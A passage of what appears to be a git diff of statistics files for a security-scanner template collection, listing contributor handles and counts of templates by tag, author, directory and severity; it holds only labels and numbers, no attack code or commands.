gondaliya","count":1},{"name":"jacalynli","count":1},{"name":"ap3r","count":1},{"name":"kiransau","count":1},{"name":"ledoubletake","count":1},{"name":"pwnwithlove","count":1},{"name":"pepitoh","count":1},{"name":"kagamigawa","count":1},{"name":"harshinsecurity","count":1},{"name":"mariam tariq","count":1},{"name":"remonsec","count":1},{"name":"sak1","count":1},{"name":"affix","count":1},{"name":"mass0ma","count":1},{"name":"0xd0ff9","count":1},{"name":"numan türle","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"husain","count":1},{"name":"bugvsme","count":1},{"name":"jeya seelan","count":1},{"name":"smaranchand","count":1},{"name":"j33n1k4","count":1},{"name":"revblock","count":1},{"name":"udinchan","count":1},{"name":"viondexd","count":1},{"name":"s1r1u5_","count":1},{"name":"y0no","count":1},{"name":"djoevanka","count":1},{"name":"stupidfish","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"aaronchen0","count":1},{"name":"2rs3c","count":1},{"name":"mlec","count":1},{"name":"rubina119","count":1},{"name":"freakyclown","count":1},{"name":"hakimkt","count":1},{"name":"rivalsec","count":1},{"name":"igibanez","count":1},{"name":"calumjelrick","count":1},{"name":"whynotke","count":1},{"name":"w8ay","count":1},{"name":"none","count":1},{"name":"sdcampbell","count":1},{"name":"th3r4id","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"aringo-bf","count":1},{"name":"httpvoid","count":1},{"name":"archer","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ramkrishna sawant","count":1},{"name":"jfbes","count":1},{"name":"dmartyn","count":1},{"name":"bjxsec","count":1},{"name":"topscoder","count":1},{"name":"piyushchhiroliya","count":1},{"name":"momen eldawakhly","count":1},{"name":"marcio mendes","count":1},{"name":"pussycat0","count":1},{"name":"paper-pen","count":1},{"name":"amanrawat","count":1},{"name":"danfaizer","count":1},{"name":"c4sper0","count":1},{"name":"mchklt","count":1},{"name":"viniciuspereiras","count":1},{"name":"shockwave","count":1},{"name":"pbuff07","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"anon-artist","count":1},{"name":"colbyjack1134","count":1},{"name":"unknown","count":1},{"name":"infosecsanyam","count":1},{"name":"professorabhay","count":1},{"name":"shifacyclewla","count":1},{"name":"adrianmf","count":1},{"name":"arqsz","count":1},{"name":"ransomsec","count":1},{"name":"esonhugh","count":1},{"name":"ringo","count":1},{"name":"rschio","count":1},{"name":"droberson","count":1},{"name":"guax1","count":1},{"name":"therealtoastycat","count":1},{"name":"arall","count":1},{"name":"erethon","count":1},{"name":"ok_bye_now","count":1},{"name":"th3.d1p4k","count":1},{"name":"barthy.koeln","count":1},{"name":"lbb","count":1},{"name":"omarkurt","count":1},{"name":"jna1","count":1},{"name":"ooooooo_q","count":1},{"name":"brabbit10","count":1},{"name":"sickwell","count":1},{"name":"xstp","count":1},{"name":"tea","count":1},{"name":"0xrod","count":1},{"name":"kailashbohara","count":1},{"name":"mrcl0wnlab","count":1},{"name":"regala_","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"kiks7","count":1},{"name":"becivells","count":1},{"name":"mesaglio","count":1},{"name":"high","count":1},{"name":"intx0x80","count":1},{"name":"mayank_pandey01","count":1},{"name":"noamrathaus","count":1},{"name":"knassar702","count":1},{"name":"caon","count":1},{"name":"makyotox","count":1},{"name":"elder tao","count":1},{"name":"k3rwin","count":1},{"name":"evan rubinstien","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"amnotacat","count":1},{"name":"shivampand3y","count":1},{"name":"tirtha_mandal","count":1},{"name":"shiar","count":1},{"name":"s1r1us","count":1},{"name":"mah3sec_","count":1},{"name":"r3nz0","count":1},{"name":"galoget","count":1},{"name":"clment cruchet","count":1},{"name":"manasmbellani","count":1},{"name":"hlop","count":1},{"name":"petergrifin","count":1},{"name":"juliosmelo","count":1},{"name":"ph33rr","count":1},{"name":"ramondunker","count":1},{"name":"cbadke","count":1},{"name":"jteles","count":1},{"name":"sorrowx3","count":1},{"name":"kazgangap","count":1},{"name":"zinminphy0","count":1},{"name":"flag007","count":1},{"name":"domenicoveneziano","count":1},{"name":"aravind","count":1},{"name":"noobexploiter","count":1},{"name":"banana69","count":1},{"name":"t3l3machus","count":1},{"name":"secthebit","count":1},{"name":"yashgoti","count":1},{"name":"apt-mirror","count":1},{"name":"carlosvieira","count":1},{"name":"allenwest24","count":1},{"name":"failopen","count":1},{"name":"lamscun","count":1},{"name":"patralos","count":1},{"name":"luskabol","count":1},{"name":"m0ck3d","count":1},{"name":"imhunterand","count":1},{"name":"charanrayudu","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"iphantasmic","count":1},{"name":"dabla","count":1},{"name":"ilovebinbash","count":1},{"name":"couskito","count":1},{"name":"kabirsuda","count":1},{"name":"watchtowr","count":1},{"name":"axrk","count":1},{"name":"savik","count":1},{"name":"0xceba","count":1},{"name":"undefl0w","count":1},{"name":"akshansh","count":1},{"name":"abbas.heybati","count":1},{"name":"wpsec","count":1},{"name":"patrick pirker","count":1},{"name":"ldionmarcil","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"yaser_s","count":1},{"name":"open-sec","count":1},{"name":"egemenkochisarli","count":1},{"name":"yavolo","count":1},{"name":"davidfegyver","count":1},{"name":"nielsing","count":1},{"name":"daviey","count":1},{"name":"justmumu","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"h4sh5","count":1},{"name":"ptonewreckin","count":1},{"name":"millermedia","count":1},{"name":"narluin","count":1},{"name":"pdp","count":1},{"name":"kurohost","count":1},{"name":"unblvr1","count":1},{"name":"mukundbhuva","count":1},{"name":"palanichamy_perumal","count":1},{"name":"pphuahua","count":1},{"name":"skylark-lab","count":1},{"name":"vinit989","count":1},{"name":"bartu utku sarp","count":1},{"name":"sanineng","count":1},{"name":"h4kux","count":1},{"name":"xshuden","count":1},{"name":"mabdullah22","count":1},{"name":"am0nt31r0","count":1},{"name":"nobody","count":1},{"name":"micha3lb3n","count":1},{"name":"kr1shna4garwal","count":1},{"name":"joaonevess","count":1},{"name":"xcapri","count":1},{"name":"xc1ym","count":1},{"name":"fpatrik","count":1},{"name":"gpiechnik2","count":1},{"name":"yuansec","count":1},{"name":"notwhy","count":1},{"name":"harryha","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"adamparsons","count":1},{"name":"qianbenhyu","count":1},{"name":"ohlinge","count":1},{"name":"nytr0gen","count":1},{"name":"erikowen","count":1},{"name":"jas37","count":1},{"name":"lrtk-coder","count":1},{"name":"miroslavsotak","count":1},{"name":"amirmsafari","count":1},{"name":"sec_hawk","count":1},{"name":"hanlaomo","count":1},{"name":"yiran","count":1},{"name":"elmahdi","count":1},{"name":"furkansenan","count":1},{"name":"ahmed abou-ela","count":1},{"name":"rotembar","count":1},{"name":"kaizensecurity","count":1}],"directory":[{"name":"http","count":7267},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":133},{"name":"code","count":80},{"name":"javascript","count":42},{"name":"ssl","count":28},{"name":"dns","count":21},{"name":"headless","count":11},{"name":"cloud","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3605},{"name":"high","count":1601},{"name":"medium","count":1463},{"name":"critical","count":967},{"name":"low","count":257},{"name":"unknown","count":35}],"types":[{"name":"file","count":337},{"name":"dns","count":24}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4ea9e86bf7..73dde66e23 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5166 +1,5197 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2388 | dhiyaneshdk | 1189 | http | 7229 | info | 3544 | file | 312 | -| panel | 1093 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 | -| wordpress | 954 | dwisiswant0 | 802 | workflows | 191 | medium | 1464 | | | -| xss | 892 | pikpikcu | 353 | network | 132 | critical | 960 | | | -| exposure | 892 | pussycat0x | 313 | code | 80 | low | 258 | | | -| wp-plugin | 829 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | | -| osint | 791 | pdteam | 285 | javascript | 26 | | | | | -| tech | 661 | ricardomaia | 231 | dns | 18 | | | | | -| lfi | 634 | geeknik | 227 | headless | 11 | | | | | -| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | -| misconfig | 593 | r3y3r53 | 200 | TEMPLATES-STATS.json | 1 | | | | | -| rce | 571 | 0x_akoko | 179 | cves.json | 1 | | | | | -| packetstorm | 518 | princechaddha | 165 | contributors.json | 1 | | | | | -| cve2021 | 488 | gy741 | 158 | | | | | | | -| wpscan | 483 | rxerium | 135 | | | | | | | -| cve2022 | 469 | sleepingbag945 | 132 | | | | | | | -| wp | 406 | arafatansari | 119 | | | | | | | -| unauth | 356 | tess | 109 | | | | | | | -| cve2023 | 338 | righettod | 99 | | | | | | | -| authenticated | 333 | pdresearch | 71 | | | | | | | -| sqli | 327 | madrobot | 65 | | | | | | | -| file | 321 | zzeitlin | 64 | | | | | | | -| intrusive | 288 | idealphase | 63 | | | | | | | -| kev | 268 | akincibor | 59 | | | | | | | -| cve2020 | 257 | iamnoooob | 59 | | | | | | | -| token-spray | 243 | for3stco1d | 55 | | | | | | | -| login | 225 | rootxharsh | 52 | | | | | | | -| config | 217 | philippedelteil | 48 | | | | | | | -| top-200 | 215 | gaurang | 42 | | | | | | | -| detect | 214 | edoardottt | 41 | | | | | | | -| osint-social | 210 | johnk3r | 39 | | | | | | | -| oast | 209 | c-sh0 | 35 | | | | | | | -| default-login | 199 | j4vaovo | 34 | | | | | | | -| token | 194 | luisfelipe146 | 31 | | | | | | | -| | 191 | adam crosser | 31 | | | | | | | -| apache | 178 | ice3man | 28 | | | | | | | -| iot | 166 | pwnhxl | 25 | | | | | | | -| cve2019 | 163 | hardik-solanki | 24 | | | | | | | -| cve2018 | 161 | organiccrap | 24 | | | | | | | -| network | 157 | ctflearner | 23 | | | | | | | -| joomla | 146 | techbrunchfr | 23 | | | | | | | -| malware | 140 | harsh | 23 | | | | | | | -| redirect | 132 | mastercho | 22 | | | | | | | -| keys | 130 | ffffffff0x | 22 | | | | | | | -| auth-bypass | 123 | parthmalhotra | 18 | | | | | | | -| phishing | 115 | sullo | 18 | | | | | | | -| cve2010 | 112 | cckuailong | 18 | | | | | | | -| files | 111 | 0xpugazh | 16 | | | | | | | -| ssrf | 111 | random-robbie | 16 | | | | | | | -| cve2017 | 110 | shaikhyaser | 16 | | | | | | | -| router | 107 | lu4nx | 16 | | | | | | | -| cms | 107 | pr3r00t | 15 | | | | | | | -| install | 103 | unapibageek | 15 | | | | | | | -| top-100 | 100 | sheikhrishad | 15 | | | | | | | -| disclosure | 87 | tenbird | 14 | | | | | | | -| devops | 87 | dogasantos | 14 | | | | | | | -| linux | 82 | milo2012 | 14 | | | | | | | -| code | 80 | r3dg33k | 14 | | | | | | | -| local | 79 | 0ri2n | 13 | | | | | | | -| privesc | 79 | sharath | 13 | | | | | | | -| tokens | 78 | bhutch | 13 | | | | | | | -| seclists | 76 | melbadry9 | 13 | | | | | | | -| takeover | 74 | elsfa7110 | 13 | | | | | | | -| fileupload | 71 | nullfuzz | 13 | | | | | | | -| oracle | 70 | theabhinavgaur | 13 | | | | | | | -| oss | 67 | meme-lord | 12 | | | | | | | -| cisco | 64 | suman_kar | 12 | | | | | | | -| adobe | 61 | wdahlenb | 11 | | | | | | | -| huntr | 59 | cyllective | 11 | | | | | | | -| cve2015 | 58 | kazet | 11 | | | | | | | -| cve2016 | 56 | random_robbie | 10 | | | | | | | -| google | 56 | 0x240x23elu | 10 | | | | | | | -| atlassian | 56 | hackergautam | 10 | | | | | | | -| vmware | 54 | alph4byt3 | 10 | | | | | | | -| ir | 50 | logicalhunter | 10 | | | | | | | -| logs | 49 | co5mos | 10 | | | | | | | -| tenable | 47 | nadino | 10 | | | | | | | -| log4j | 46 | initstring | 9 | | | | | | | -| aem | 45 | olearycrew | 9 | | | | | | | -| hackerone | 45 | emadshanab | 9 | | | | | | | -| debug | 45 | momika233 | 9 | | | | | | | -| osint-gaming | 45 | fabaff | 9 | | | | | | | -| cve2014 | 44 | oppsec | 9 | | | | | | | -| vulhub | 44 | adamcrosser | 9 | | | | | | | -| jndi | 44 | _0xf4n9x_ | 8 | | | | | | | -| c2 | 44 | zh | 8 | | | | | | | -| aws | 44 | that_juan_ | 8 | | | | | | | -| cloud | 43 | veshraj | 8 | | | | | | | -| traversal | 42 | noraj | 8 | | | | | | | -| deserialization | 42 | aashiq | 8 | | | | | | | -| plugin | 42 | irshad ahamed | 8 | | | | | | | -| osint-hobby | 42 | iamthefrogy | 8 | | | | | | | -| osint-porn | 42 | divya_mudgal | 7 | | | | | | | -| generic | 42 | harshbothra_ | 7 | | | | | | | -| enum | 41 | caspergn | 7 | | | | | | | -| oa | 41 | randomstr1ng | 7 | | | | | | | -| springboot | 41 | kophjager007 | 7 | | | | | | | -| php | 41 | dr_set | 7 | | | | | | | -| cnvd | 39 | tarunkoyalwar | 7 | | | | | | | -| misc | 38 | nodauf | 7 | | | | | | | -| listing | 37 | its0x08 | 7 | | | | | | | -| microsoft | 37 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| kubernetes | 37 | leovalcante | 7 | | | | | | | -| jira | 37 | huta0 | 7 | | | | | | | -| injection | 36 | techryptic (@tech) | 7 | | | | | | | -| bruteforce | 35 | amit-jd | 7 | | | | | | | -| ibm | 35 | devang-solanki | 6 | | | | | | | -| osint-misc | 35 | clem9669 | 6 | | | | | | | -| cti | 32 | imnightmaree | 6 | | | | | | | -| sap | 32 | __fazal | 6 | | | | | | | -| js | 32 | evan rubinstein | 6 | | | | | | | -| miscellaneous | 32 | megamansec | 6 | | | | | | | -| osint-tech | 31 | xelkomy | 6 | | | | | | | -| osint-coding | 30 | praetorian-thendrickson | 6 | | | | | | | -| tls | 28 | forgedhallpass | 6 | | | | | | | -| wp-theme | 28 | pentest_swissky | 6 | | | | | | | -| gitlab | 28 | gitlab red team | 6 | | | | | | | -| k8s | 28 | pathtaga | 6 | | | | | | | -| dlink | 27 | ja1sh | 6 | | | | | | | -| amazon | 27 | puzzlepeaches | 6 | | | | | | | -| ssl | 27 | byt3bl33d3r | 6 | | | | | | | -| api | 27 | justaacat | 6 | | | | | | | -| bestwebsoft | 27 | vicrack | 5 | | | | | | | -| ssh | 26 | panch0r3d | 5 | | | | | | | -| cve2024 | 26 | kh4sh3i | 5 | | | | | | | -| weaver | 25 | s0obi | 5 | | | | | | | -| proxy | 25 | r3naissance | 5 | | | | | | | -| manageengine | 25 | your3cho | 5 | | | | | | | -| cve2012 | 25 | shine | 5 | | | | | | | -| firewall | 25 | ganofins | 5 | | | | | | | -| fortinet | 24 | r12w4n | 5 | | | | | | | -| osint-images | 24 | arm!tage | 5 | | | | | | | -| zoho | 24 | andreluna | 5 | | | | | | | -| osint-business | 24 | robotshell | 5 | | | | | | | -| osint-shopping | 24 | gtrrnr | 5 | | | | | | | -| admin | 24 | mr-xn | 5 | | | | | | | -| osint-finance | 24 | joanbono | 5 | | | | | | | -| tomcat | 23 | prajiteshsingh | 5 | | | | | | | -| stored-xss | 23 | powerexploit | 5 | | | | | | | -| lfr | 23 | defr0ggy | 5 | | | | | | | -| yonyou | 23 | podalirius | 5 | | | | | | | -| cicd | 22 | yanyun | 5 | | | | | | | -| audit | 22 | ice3man543 | 4 | | | | | | | -| file-upload | 22 | lum8rjack | 4 | | | | | | | -| xxe | 22 | dolev farhi | 4 | | | | | | | -| printer | 21 | xxcdd | 4 | | | | | | | -| ecology | 21 | cookiehanhoan | 4 | | | | | | | -| msf | 21 | jpg0mez | 4 | | | | | | | -| weblogic | 21 | e_schultze_ | 4 | | | | | | | -| github | 21 | tanq16 | 4 | | | | | | | -| citrix | 20 | k0pak4 | 4 | | | | | | | -| camera | 20 | incogbyte | 4 | | | | | | | -| jenkins | 20 | nybble04 | 4 | | | | | | | -| dns | 20 | dadevel | 4 | | | | | | | -| struts | 19 | wisnupramoedya | 4 | | | | | | | -| grafana | 19 | 3th1c_yuk1 | 4 | | | | | | | -| wavlink | 19 | h1ei1 | 4 | | | | | | | -| hp | 19 | shankar acharya | 4 | | | | | | | -| rukovoditel | 19 | ggranjus | 4 | | | | | | | -| cve2011 | 18 | heeress | 4 | | | | | | | -| osint-music | 18 | 0xr2r | 4 | | | | | | | -| prestashop | 18 | hahwul | 4 | | | | | | | -| android | 18 | king-alexander | 4 | | | | | | | -| ruijie | 18 | scent2d | 4 | | | | | | | -| coldfusion | 18 | parth | 3 | | | | | | | -| azure | 17 | evergreencartoons | 3 | | | | | | | -| node.js | 17 | mavericknerd | 3 | | | | | | | -| confluence | 17 | davidmckennirey | 3 | | | | | | | -| ftp | 17 | vagnerd | 3 | | | | | | | -| service | 17 | dr0pd34d | 3 | | | | | | | -| nginx | 17 | farish | 3 | | | | | | | -| jarm | 16 | me9187 | 3 | | | | | | | -| honeypot | 16 | lucky0x0d | 3 | | | | | | | -| backup | 16 | badboycxcc | 3 | | | | | | | -| rconfig | 16 | true13 | 3 | | | | | | | -| alibaba | 16 | impramodsargar | 3 | | | | | | | -| status | 16 | e1a | 3 | | | | | | | -| cve2009 | 16 | matt galligan | 3 | | | | | | | -| mail | 16 | yuzhe-zhang-0 | 3 | | | | | | | -| osint-blog | 16 | z3bd | 3 | | | | | | | -| microweber | 16 | andydoering | 3 | | | | | | | -| bypass | 15 | atomiczsec | 3 | | | | | | | -| cve2013 | 15 | swissky | 3 | | | | | | | -| woocommerce | 15 | sushantkamble | 3 | | | | | | | -| java | 15 | j3ssie | 3 | | | | | | | -| seeyon | 15 | aringo | 3 | | | | | | | -| magento | 15 | f1tz | 3 | | | | | | | -| cve2008 | 15 | dudez | 3 | | | | | | | -| tongda | 15 | binaryfigments | 3 | | | | | | | -| cnvd2021 | 15 | skeltavik | 3 | | | | | | | -| nodejs | 15 | randomrobbie | 3 | | | | | | | -| zyxel | 15 | ph33r | 3 | | | | | | | -| smtp | 14 | ekrause | 3 | | | | | | | -| login-check | 14 | iamnooob | 3 | | | | | | | -| osint-health | 14 | jarijaas | 3 | | | | | | | -| node | 14 | m4lwhere | 3 | | | | | | | -| domainmod | 14 | fxploit | 3 | | | | | | | -| npm | 14 | canberbamber | 3 | | | | | | | -| dashboard | 14 | lark-lab | 3 | | | | | | | -| ruby | 14 | unstabl3 | 3 | | | | | | | -| zohocorp | 14 | cheesymoon | 3 | | | | | | | -| auth | 14 | emenalf | 3 | | | | | | | -| creds-stuffing | 14 | imjust0 | 3 | | | | | | | -| jboss | 14 | coldfish | 3 | | | | | | | -| icewarp | 14 | lucasljm2001 | 3 | | | | | | | -| dell | 14 | taielab | 3 | | | | | | | -| vpn | 14 | xianke | 3 | | | | | | | -| backdoor | 14 | ambassify | 3 | | | | | | | -| osint-art | 14 | isacaya | 3 | | | | | | | -| netgear | 13 | alifathi-h1 | 3 | | | | | | | -| docker | 13 | bernardofsr | 3 | | | | | | | -| windows | 13 | splint3r7 | 3 | | | | | | | -| graphql | 13 | johnjhacking | 3 | | | | | | | -| rails | 13 | fyoorer | 3 | | | | | | | -| osint-political | 13 | huowuzhao | 3 | | | | | | | -| setup | 13 | 0w4ys | 3 | | | | | | | -| cuppacms | 13 | yash anand @yashanand155 | 3 | | | | | | | -| osint-dating | 13 | thomas_from_offensity | 3 | | | | | | | -| laravel | 13 | arcc | 3 | | | | | | | -| abstractapi | 13 | shifacyclewala | 3 | | | | | | | -| git | 13 | vsh00t | 3 | | | | | | | -| fortigate | 13 | flx | 3 | | | | | | | -| sonicwall | 13 | whoever | 3 | | | | | | | -| cuppa | 13 | _generic_human_ | 3 | | | | | | | -| airflow | 13 | thezakman | 2 | | | | | | | -| drupal | 12 | clarkvoss | 2 | | | | | | | -| netsweeper | 12 | bp0lr | 2 | | | | | | | -| ivanti | 12 | pxmme1337 | 2 | | | | | | | -| ofbiz | 12 | joshlarsen | 2 | | | | | | | -| redis | 12 | shankaracharya | 2 | | | | | | | -| headless | 12 | herry | 2 | | | | | | | -| webserver | 12 | vavkamil | 2 | | | | | | | -| kafka | 12 | hackerarpan | 2 | | | | | | | -| moosocial | 12 | dogancanbakir | 2 | | | | | | | -| ssti | 12 | usdag | 2 | | | | | | | -| zimbra | 12 | n-thumann | 2 | | | | | | | -| vbulletin | 11 | paradessia | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | mrharshvardhan | 2 | | | | | | | -| phpgurukul | 11 | brucelsone | 2 | | | | | | | -| jetbrains | 11 | github.com/its0x08 | 2 | | | | | | | -| online-fire-reporting | 11 | supr4s | 2 | | | | | | | -| osint-video | 11 | hetroublemakr | 2 | | | | | | | -| xstream | 11 | 0xsmiley | 2 | | | | | | | -| phpmyadmin | 11 | dbrwsky | 2 | | | | | | | -| spring | 11 | supras | 2 | | | | | | | -| jolokia | 11 | ajaysenr | 2 | | | | | | | -| fastjson | 11 | bmcel | 2 | | | | | | | -| solarview | 10 | foulenzer | 2 | | | | | | | -| digitalocean | 10 | y4er | 2 | | | | | | | -| db | 10 | 0xsapra | 2 | | | | | | | -| django | 10 | cocxanh | 2 | | | | | | | -| installer | 10 | israel comazzetto dos reis | 2 | | | | | | | -| symfony | 10 | parzival | 2 | | | | | | | -| elasticsearch | 10 | nkxxkn | 2 | | | | | | | -| glpi | 10 | mzack9999 | 2 | | | | | | | -| prometheus | 10 | ehsahil | 2 | | | | | | | -| cache | 10 | dahse89 | 2 | | | | | | | -| dedecms | 10 | davidegirardi | 2 | | | | | | | -| thinkphp | 10 | koti2 | 2 | | | | | | | -| hikvision | 10 | shelled | 2 | | | | | | | -| nagios | 10 | 6mile | 2 | | | | | | | -| xstream_project | 10 | nuk3s3c | 2 | | | | | | | -| sitecore | 10 | salts | 2 | | | | | | | -| solr | 10 | thardt-praetorian | 2 | | | | | | | -| zabbix | 10 | sy3omda | 2 | | | | | | | -| iis | 10 | k11h-de | 2 | | | | | | | -| facebook | 9 | 666asd | 2 | | | | | | | -| moodle | 9 | luci | 2 | | | | | | | -| newrelic | 9 | joshua rogers | 2 | | | | | | | -| gitea | 9 | g4l1t0 | 2 | | | | | | | -| dropbox | 9 | gal nagli | 2 | | | | | | | -| druid | 9 | amsda | 2 | | | | | | | -| scada | 9 | cckuakilong | 2 | | | | | | | -| versa | 9 | rafaelwdornelas | 2 | | | | | | | -| smb | 9 | ree4pwn | 2 | | | | | | | -| lucee | 9 | maximus decimus | 2 | | | | | | | -| exchange | 9 | thevillagehacker | 2 | | | | | | | -| vcenter | 9 | h0j3n | 2 | | | | | | | -| pfsense | 9 | x1m_martijn | 2 | | | | | | | -| python | 9 | zy9ard3 | 2 | | | | | | | -| info-leak | 9 | sbani | 2 | | | | | | | -| bitbucket | 9 | mohammedsaneem | 2 | | | | | | | -| artica | 9 | socketz | 2 | | | | | | | -| kube | 9 | w4cky_ | 2 | | | | | | | -| wso2 | 9 | ep1csage | 2 | | | | | | | -| sangfor | 9 | danielmofer | 2 | | | | | | | -| firebase | 9 | liwermor | 2 | | | | | | | -| secret | 9 | 0xelkomy | 2 | | | | | | | -| cnvd2020 | 9 | nvn1729 | 2 | | | | | | | -| opencats | 9 | christianpoeschl | 2 | | | | | | | -| hashicorp | 9 | 8arthur | 2 | | | | | | | -| crlf | 8 | thabisocn | 2 | | | | | | | -| emerge | 8 | myztique | 2 | | | | | | | -| samsung | 8 | streetofhackerr007 | 2 | | | | | | | -| phpinfo | 8 | raesene | 2 | | | | | | | -| cloud-enum | 8 | randomdhiraj | 2 | | | | | | | -| phpjabbers | 8 | notnotnotveg | 2 | | | | | | | -| instrusive | 8 | 0xnirvana | 2 | | | | | | | -| cisco-switch | 8 | c3l3si4n | 2 | | | | | | | -| recon | 8 | florianmaak | 2 | | | | | | | -| elastic | 8 | paperpen | 2 | | | | | | | -| ognl | 8 | wa1tf0rme | 2 | | | | | | | -| dahua | 8 | sascha brendel | 2 | | | | | | | -| wanhu | 8 | kishore-hariram | 2 | | | | | | | -| go | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| atom | 8 | kre80r | 2 | | | | | | | -| osint-news | 8 | msegoviag | 2 | | | | | | | -| discord | 8 | 0xcrypto | 2 | | | | | | | -| mlflow | 8 | korteke | 2 | | | | | | | -| default-page | 8 | convisoappsec | 2 | | | | | | | -| console | 8 | z0ne | 2 | | | | | | | -| symantec | 8 | brenocss | 2 | | | | | | | -| config-audit | 8 | uomogrande | 2 | | | | | | | -| metadata | 8 | codexlynx | 2 | | | | | | | -| unauthenticated | 8 | manas_harsh | 2 | | | | | | | -| mirai | 8 | geekby | 2 | | | | | | | -| spotweb | 8 | bananabr | 2 | | | | | | | -| oauth | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| hms | 8 | lotusdll | 2 | | | | | | | -| sophos | 8 | d4vy | 2 | | | | | | | -| huawei | 8 | dheerajmadhukar | 2 | | | | | | | -| manager | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| e-office | 8 | 0xrudra | 2 | | | | | | | -| bucket | 8 | ayadim | 2 | | | | | | | -| exploitdb | 7 | bsysop | 2 | | | | | | | -| blind | 7 | redteambrasil | 2 | | | | | | | -| fortios | 7 | udit_thakkur | 2 | | | | | | | -| vms | 7 | martincodes-de | 2 | | | | | | | -| ruckus | 7 | bing0o | 2 | | | | | | | -| keking | 7 | joeldeleep | 2 | | | | | | | -| monstra | 7 | sinkettu | 2 | | | | | | | -| fuzzing | 7 | zomsop82 | 2 | | | | | | | -| blockchain | 7 | gevakun | 2 | | | | | | | -| maps | 7 | afaq | 2 | | | | | | | -| error | 7 | kiblyn11 | 2 | | | | | | | -| bloofox | 7 | moritz nentwig | 2 | | | | | | | -| avtech | 7 | v0idc0de | 2 | | | | | | | -| nagiosxi | 7 | danmcinerney | 2 | | | | | | | -| filemanager | 7 | arliya | 2 | | | | | | | -| bigip | 7 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| solarwinds | 7 | godfatherorwa | 1 | | | | | | | -| shopify | 7 | higor melgaço (eremit4) | 1 | | | | | | | -| websphere | 7 | spac3wh1te | 1 | | | | | | | -| nacos | 7 | zsusac | 1 | | | | | | | -| activemq | 7 | ph33rr | 1 | | | | | | | -| fpd | 7 | bibeksapkota (sar00n) | 1 | | | | | | | -| slack | 7 | shelld3v | 1 | | | | | | | -| odoo | 7 | marcio mendes | 1 | | | | | | | -| gogs | 7 | xeldax | 1 | | | | | | | -| car_rental_management_system_project | 7 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| cacti | 7 | shreyapohekar | 1 | | | | | | | -| redhat | 7 | viondexd | 1 | | | | | | | -| mobileiron | 7 | wlayzz | 1 | | | | | | | -| nexus | 7 | pphuahua | 1 | | | | | | | -| squirrelmail | 7 | ohlinge | 1 | | | | | | | -| spotweb_project | 7 | ramkrishna sawant | 1 | | | | | | | -| joomla\! | 7 | mubassirpatel | 1 | | | | | | | -| moodating | 7 | bjxsec | 1 | | | | | | | -| doppler | 7 | fq_hsu | 1 | | | | | | | -| opensis | 7 | yiran | 1 | | | | | | | -| pmb | 7 | jfbes | 1 | | | | | | | -| ec2 | 7 | sdcampbell | 1 | | | | | | | -| express | 6 | abbas.heybati | 1 | | | | | | | -| advantech | 6 | berkdusunur | 1 | | | | | | | -| jamf | 6 | bughuntersurya | 1 | | | | | | | -| chanjet | 6 | affix | 1 | | | | | | | -| jeecg | 6 | natto97 | 1 | | | | | | | -| kubelet | 6 | technicaljunkie | 1 | | | | | | | -| microfocus | 6 | act1on3 | 1 | | | | | | | -| webmin | 6 | fmunozs | 1 | | | | | | | -| servicenow | 6 | shockwave | 1 | | | | | | | -| contec | 6 | 0h1in9e | 1 | | | | | | | -| keycloak | 6 | daviey | 1 | | | | | | | -| zhiyuan | 6 | adilsoybali | 1 | | | | | | | -| flutterwave | 6 | bywalks | 1 | | | | | | | -| cobbler | 6 | fpatrik | 1 | | | | | | | -| sql | 6 | dievus | 1 | | | | | | | -| paypal | 6 | cbadke | 1 | | | | | | | -| mysql | 6 | evan rubinstien | 1 | | | | | | | -| jetty | 6 | mbmy | 1 | | | | | | | -| doctor-appointment-system | 6 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| s3 | 6 | freakyclown | 1 | | | | | | | -| liferay | 6 | thelicato | 1 | | | | | | | -| leak | 6 | udyz | 1 | | | | | | | -| sonarqube | 6 | apt-mirror | 1 | | | | | | | -| gcp | 6 | professorabhay | 1 | | | | | | | -| typo3 | 6 | pratik khalane | 1 | | | | | | | -| database | 6 | vulnspace | 1 | | | | | | | -| openvpn | 6 | therealtoastycat | 1 | | | | | | | -| cockpit | 6 | bad5ect0r | 1 | | | | | | | -| doctor_appointment_system_project | 6 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| teamcity | 6 | patrick pirker | 1 | | | | | | | -| magmi | 6 | jeya seelan | 1 | | | | | | | -| asp | 6 | luciannitescu | 1 | | | | | | | -| mongodb | 6 | compr00t | 1 | | | | | | | -| tikiwiki | 6 | kba@sogeti_esec | 1 | | | | | | | -| progress | 6 | chesterblue | 1 | | | | | | | -| elfinder | 6 | izn0u | 1 | | | | | | | -| 74cms | 6 | kurohost | 1 | | | | | | | -| log | 6 | ayadi | 1 | | | | | | | -| microstrategy | 6 | yuansec | 1 | | | | | | | -| plesk | 6 